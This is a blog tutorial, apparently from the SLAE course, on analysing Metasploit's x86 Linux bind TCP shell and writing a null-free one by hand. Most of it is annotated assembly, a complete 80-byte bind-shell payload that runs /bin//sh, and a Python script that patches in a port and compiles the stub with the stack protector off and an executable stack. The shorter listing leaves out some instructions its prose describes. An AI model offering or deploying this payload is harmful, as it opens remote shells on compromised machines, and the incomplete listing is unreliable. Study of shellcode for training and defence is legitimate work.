Dear readers, almost everyone in the infosec community uses a bind TCP shell on a daily basis. I have also seen many people blindly copy shellcode from the internet and paste it into exploits without knowing what it might be carrying. Today, we will uncover how a bind TCP shell works and, based on that analysis, develop one ourselves. If you are not familiar with assembly, consider enrolling in the SLAE course from SecurityTube; it is one of the best classes available, and this post is based on what I learned there. The agenda of this exercise is to:
- Analyze the Bind Shell generated from Metasploit
- Create your own shellcode based on the analysis
- Remove any Null bytes (Bad Characters)
- Generate a space friendly shellcode (minimalistic)
- Write a wrapper to dynamically change the bind port
So let's get started. We will use libemu to analyze the shell_bind_tcp shellcode for x86 Linux. The analysis of this shellcode can be produced with the following command:
msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f raw | sctest -vvv -Ss 10000
Creating a graphical representation of the shellcode using libemu gives the following flow diagram of the payload:
Figure: Analysis of the bind TCP shellcode generated using msfvenom
The workflow is straightforward and shows all the important system calls used by the shellcode. Let us also trace the system calls and the parameters involved using strace:
Figure: strace analysis of the shellcode
We can clearly see the order of the system calls and the parameters passed to them. Let's use this information as the base for our shellcode and jump straight into building one from scratch:
xor ebx,ebx ; Clearing EBX Register
xor eax,eax ; Clearing EAX Register
mov al,102 ; Moving SocketCall to EAX(Sys Call Number= 102)
inc bl ; Setting EBX to 1 (SYS_SOCKET) with INC instead of MOV
push esi ; Pushing 0 onto the stack(0: IPPROTO_IP); assumes ESI already holds 0
push byte 1 ; Pushing 1 onto the stack(1: SOCK_STREAM)
push byte 2 ; Pushing 2 onto the stack(2: AF_INET)
mov ecx,esp ; Load pointer to the stack structure to ECX
int 0x80 ; Calling Interrupt
What did we do? We first cleared the EAX and EBX registers and moved the socketcall identifier (102, or 0x66) into AL. We could have moved 1 into BL; instead, we used the INC (increment) instruction, which leaves BL holding 1. We pushed 0 onto the stack, which is the value for IPPROTO_IP (the PUSH ESI relies on ESI already being 0). Similarly, we pushed 1 and 2, which are SOCK_STREAM and AF_INET. The stack now contains {2,1,0}. With EAX and EBX set, ECX must point to these arguments, so we copy ESP into ECX. Finally, we trigger the interrupt. Looking at socketcall:
int socketcall(int call, unsigned long *args);
- The socketcall identifier is 102 ---> EAX
- int call identifier is 1 ----> 1: SYS_SOCKET ---> EBX
- unsigned long *args ---->{2,1,0} ---> Address ---> ECX
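To make the register mapping above concrete, here is a minimal Python sketch of what ECX points to when the interrupt fires. The helper name `pack_args` is made up for illustration; the call numbers are the standard socketcall values on x86 Linux.

```python
import struct

# Call numbers multiplexed through socketcall(2) on x86 Linux
SYS_SOCKET, SYS_BIND, SYS_LISTEN, SYS_ACCEPT = 1, 2, 4, 5
SYS_SOCKETCALL = 102  # value loaded into EAX (0x66)

AF_INET, SOCK_STREAM, IPPROTO_IP = 2, 1, 0

def pack_args(*values):
    """Lay out 32-bit little-endian arguments the way ECX sees them (hypothetical helper)."""
    return struct.pack("<%dI" % len(values), *values)

# Pushing 0, then 1, then 2 leaves 2 at the lowest address (the top of the stack)
socket_args = pack_args(AF_INET, SOCK_STREAM, IPPROTO_IP)
print(socket_args.hex())
```

The arguments are pushed in reverse order because the stack grows downwards, so the last value pushed is the first one the kernel reads.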
With SYS_SOCKET set up, the next task is to set up the bind call. Let's get started:
xchg edi,eax ; Saving the Result After Syscall from EAX to EDI
push esi ; Zero Pushed onto the Stack
push word 0xb822 ; Port 8888 Pushed onto the Stack
push word 2 ; 2 Pushed onto the Stack
mov ebx,esp ; Top of the stack stored to EBX--->{0xb8220002,0}
push byte 16 ; 16 Pushed onto the Stack
push ebx ; Pointer ---> {Port,0}
push edi ; EDI Points to Result from SocketCALL
xor ebx,ebx ; Clearing EBX
mul ebx ; Clearing EAX
mov al,102 ; SOCKETCALL Identifier
mov bl,2 ; int call is bind here; 2
mov ecx,esp ; Address of the top of the stack to ECX
int 0x80 ; Interrupt
int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
We move the result of the previous call from EAX to EDI; this is the value to be passed as sockfd. We push 0 onto the stack with PUSH ESI and then place 0xb8220002 on the stack. We did this in two steps using the push word instruction because pushing it in one go would have produced a NULL byte from the leading zeros of 0x0002. The stack now holds {0xb8220002, 0x00000000}. We store the current ESP in EBX. Next, we push 16, which is the socklen_t value, then EBX as the sockaddr pointer, and finally the sockfd stored in EDI.
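The byte order of the port is easy to get wrong, so here is a small Python sketch of the sockaddr_in layout described above. The variable names are illustrative only; the full 16-byte structure is built here for clarity, whereas the assembly only writes the first 8 bytes.

```python
import struct
import socket

PORT = 8888
AF_INET = 2

# sin_port is stored in network (big-endian) byte order
port_bytes = struct.pack(">H", PORT)

# `push word 0xb822` writes a little-endian word, so memory ends up holding 22 b8
pushed_word = struct.pack("<H", 0xb822)

# struct sockaddr_in: family (2 bytes, host order), port, IPv4 address, 8 padding bytes
sockaddr_in = (struct.pack("<H", AF_INET) + port_bytes
               + socket.inet_aton("0.0.0.0") + b"\x00" * 8)
print(port_bytes.hex(), pushed_word.hex(), len(sockaddr_in))
```

Read as a little-endian dword, the first four bytes (02 00 22 b8) are the 0xb8220002 value mentioned in the text.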
We now have the complete argument structure on the stack, so we can clear the EBX and EAX registers. Let's issue another socketcall with the call type SYS_BIND, identified by 2. We move 102 to EAX, 2 to EBX, and the top of the stack, which holds our argument structure, to ECX, and issue the interrupt. The next call is listen. Let's see what parameters this call requires:
int listen(int sockfd, int backlog);
push esi ; Backlog Value 0
push edi ; Pushing Sockfd onto the stack
xor ebx,ebx ; Clearing EBX
mul ebx ; Clearing EAX
mov al,102 ; SOCKETCALL
mov bl,4 ; Listen call
mov ecx,esp ; Pointing pushed values to ECX
int 0x80 ; Interrupt
Our sockfd is in EDI, so we push it onto the stack after pushing 0 for the backlog with PUSH ESI. Next, we clear the EAX and EBX registers and set them up for another socketcall. This time we move 4 to EBX, which denotes SYS_LISTEN, move the top of the stack to ECX, and issue the interrupt. Next, we move to the accept call:
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
We will set up this call the same way we did the earlier ones:
xor ebx,ebx ; Clearing EBX
mul ebx ; Clearing EAX
push esi ; 0
push esi ; 0
push edi ; Sockfd
mov al,102 ; Socketcall
mov bl,5 ; accept
mov ecx,esp ; moving pointer to {sockfd,0,0} to ECX
int 0x80 ; Generating interrupt
Pretty straightforward! We pass 0 for both the sockaddr * and socklen_t * arguments and push the sockfd held in EDI. We select this call by placing 5 (SYS_ACCEPT) in EBX. The final segment of the code contains two crucial system calls, dup2 and execve. Let's see the code fragment:
xor ecx,ecx ; Clearing ECX
mov cl,2 ; Moving 2 to ECX
int 0x80 ; Calling Interrupt
jns loop ; Jump back to loop while SF is not set
mov ebx,esp ; Pointer to Structures in Stack(Top)
int 0x80 ; Interrupt
We exchange EAX and EBX so that the result of the last system call, the client socket returned by accept, ends up in EBX. Next, we clear ECX and move the value 2 into it, because we call dup2 for three descriptors: 2, 1 and 0. We issue the dup2 call, denoted by 63, in a loop that decrements ECX until it drops below 0. Finally, we push the null-terminated string /bin//sh and point EBX to it.
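The descriptor loop can be modeled in a few lines of Python. This is only a sketch of the control flow, assuming the loop body is dup2 followed by `dec ecx` and `jns loop`, as in the 80-byte listing later in this post; no system call is actually made.

```python
def dup2_loop_descriptors(start=2):
    """Model `mov al,63 / int 0x80 / dec ecx / jns loop` starting with ECX = start."""
    visited = []
    ecx = start
    while True:
        visited.append(ecx)      # dup2(clientfd, ecx) would run here
        ecx -= 1                 # dec ecx
        sign_flag = ecx < 0      # SF mirrors the sign bit of the result
        if sign_flag:            # jns falls through once SF is set
            break
    return visited

print(dup2_loop_descriptors())   # [2, 1, 0]
```

The loop therefore covers stderr, stdout and stdin in that order, and exits only after descriptor 0 has been handled.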
Next, we clear ECX and EDX using the 0 left in EAX, move call number 11 (execve) to EAX and issue the interrupt. With the program assembled, we extract the shellcode from it, place it in a C program, compile it and run it. Everything works flawlessly.
The final version of the code can be obtained at:
https://github.com/nipunjaswal/slae-exam/tree/master/ASSGN-1
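A quick way to confirm that a byte string is free of bad characters is to scan it before pasting it into a C harness. The sketch below is an illustration rather than part of the original toolchain: `find_bad_chars` is a made-up helper, and the two sample encodings are hand-assembled to show why `xor eax,eax` followed by `mov al,102` was preferred over a plain `mov eax,102`.

```python
def find_bad_chars(shellcode, bad=b"\x00"):
    """Return (offset, byte) pairs for every bad character found in shellcode."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]

# mov eax,102 carries a 32-bit immediate, so three zero bytes appear
mov_eax_102 = bytes.fromhex("b866000000")
# xor eax,eax / mov al,102 reaches the same value without any zero byte
xor_mov_al = bytes.fromhex("31c0b066")

for name, code in (("mov eax,102", mov_eax_102), ("xor + mov al", xor_mov_al)):
    offsets = [i for i, _ in find_bad_chars(code)]
    print(name, len(code), "bytes, bad offsets:", offsets)
```

The same function can take a longer `bad` set, for example `b"\x00\x0a\x0d"`, when a target filters more than NULL bytes.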
We have a NULL-free shellcode. However, its length bothers me. Shellcode should be as small as possible, and 108 bytes does not fit that description. I have tweaked the code to make it smaller (80 bytes) using the following techniques:
- Register Re-Use
- Making use of PUSH - POP Instructions
- Using Single Byte Instructions
- XCHG instructions, and more
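To give a feel for how much each of these techniques saves, the following Python sketch compares a few hand-assembled 32-bit encodings. The table is my own illustration, not taken from the repository, and the shorter forms are not always drop-in replacements: `cdq` only zeroes EDX while EAX is non-negative, `xchg` also overwrites EAX, and `inc ebx` equals `inc bl` only while BL does not overflow.

```python
# (goal, longer form, its bytes, shorter form, its bytes)
ALTERNATIVES = [
    ("EAX = 0x66", "xor eax,eax; mov al,0x66", "31c0b066", "push 0x66; pop eax", "6a6658"),
    ("EDX = 0",    "xor edx,edx",              "31d2",     "cdq",                "99"),
    ("EBX += 1",   "inc bl",                   "fec3",     "inc ebx",            "43"),
    ("EBX <- EAX", "mov ebx,eax",              "89c3",     "xchg eax,ebx",       "93"),
]

def saved_bytes(row):
    """Number of bytes saved by the shorter encoding in one table row."""
    _, _, long_hex, _, short_hex = row
    return len(bytes.fromhex(long_hex)) - len(bytes.fromhex(short_hex))

for row in ALTERNATIVES:
    print("%-11s %-26s -> %-20s saves %d byte(s)" % (row[0], row[1], row[3], saved_bytes(row)))
```

Each row saves a single byte, which is why reaching 80 bytes takes many small substitutions rather than one big change.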
The final minimalistic shellcode is as follows:
global _start
section .text
_start:
; SYS_SOCKET
push 0x66
pop eax
cdq
push ebx
inc ebx
push ebx
push 0x2
mov ecx,esp
int 0x80
; SYS_BIND
pop ebx
pop esi
push edx
push word 0xb822
push edx
push byte 0x02
push 0x10
push ecx
push eax
mov ecx,esp
mov al,0x66
int 0x80
; SYS_LISTEN
pop edx
pop eax
xor eax,eax
push eax
push edx
cdq
mov bl,0x4
mov al,0x66
int 0x80
; SYS_ACCEPT
inc ebx
mov al,0x66
int 0x80
; DUP2
xchg eax, ebx
pop ecx
loop:
mov al,63
int 0x80
dec ecx
jns loop
done:
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push eax
mov ecx,esp
mov al,0xb ; EXECVE CALL
int 0x80
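The two large immediates near the end of the listing are the path string in disguise. A short Python check, written as a sketch with variable names of my choosing, shows how they decode once they are on the stack:

```python
import struct

# Immediates in the order the listing pushes them (the last push sits lowest in memory)
pushed = [0x68732f2f, 0x6e69622f]

# Memory order is the reverse of push order; each dword is stored little-endian
in_memory = b"".join(struct.pack("<I", value) for value in reversed(pushed))
print(in_memory)   # b'/bin//sh'
```

The doubled slash pads the path to exactly eight bytes, so it fits in two pushes with no NULL byte; the `push eax` before them supplies the terminator.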
Additionally, since we know that port 8888 appears in the shellcode as the bytes "\x22\xb8", we can build a simple generator script in Python that replaces these bytes with those of another port, changing the bind port on the fly:
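import os
import sys

stub, port = sys.argv[1], int(sys.argv[2])
print("Stub File: " + stub)
print("Port Used: " + str(port))
# Read the C stub that holds the shellcode
with open(stub + ".c") as f:
    contents = f.read().splitlines()
# Zero-pad to four hex digits so that low ports still give two bytes
port_hex = format(port, "04x")
fh, sh = port_hex[:2], port_hex[2:]
_p = "\\x{0}\\x{1}".format(fh, sh)
for j, line in enumerate(contents):
    # Assumption: the stub keeps the default port bytes (\x22\xb8) on their own line
    if "\\x22\\xb8" in line:
        print("Line Number: " + str(j))
        contents[j] = '"' + _p + '"'
nf = stub + "_new.c"
with open(nf, "w") as f:
    f.write("\n".join(contents) + "\n")
# Compile the patched stub, then delete the temporary source file
os.system("gcc {0} -o {1} -fno-stack-protector -z execstack".format(nf, stub))
os.system("rm {0}".format(nf))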
The generator takes two arguments: the name of the stub file (without the .c extension) and the port to bind to.
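The same replacement can also be done on raw bytes instead of C source text. The following is a minimal sketch under that assumption: `patch_port` is a hypothetical helper, not part of the repository, and it refuses ports whose bytes would reintroduce a NULL into the shellcode.

```python
import struct

DEFAULT_PORT = 8888

def patch_port(shellcode, new_port, old_port=DEFAULT_PORT):
    """Swap the big-endian port bytes inside a raw shellcode byte string."""
    if not 0 < new_port <= 0xFFFF:
        raise ValueError("port out of range")
    old, new = struct.pack(">H", old_port), struct.pack(">H", new_port)
    if b"\x00" in new:
        raise ValueError("port %d would introduce a null byte" % new_port)
    if shellcode.count(old) != 1:
        raise ValueError("expected exactly one occurrence of the old port bytes")
    return shellcode.replace(old, new)

# The four bytes of `push word 0xb822` (66 68 22 b8) serve as a stand-in stub
stub = bytes.fromhex("666822b8")
print(patch_port(stub, 4444).hex())   # 6668115c
```

Checking for exactly one match guards against the port bytes coinciding with an unrelated instruction sequence elsewhere in the shellcode.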
The following files were used in this exercise:
- bind_shell_108.nasm : 108 bytes original null-free shellcode
- bind_shell_80.nasm : 80 bytes null-free shellcode
- shellcode108.c : C file for 108 bytes bind TCP shellcode [Generator Format]
- shellcode80.c : C file for 80 bytes bind TCP shellcode [Generator Format]
- linux_bind_shell_generator.py : Port Wrapper for Shellcode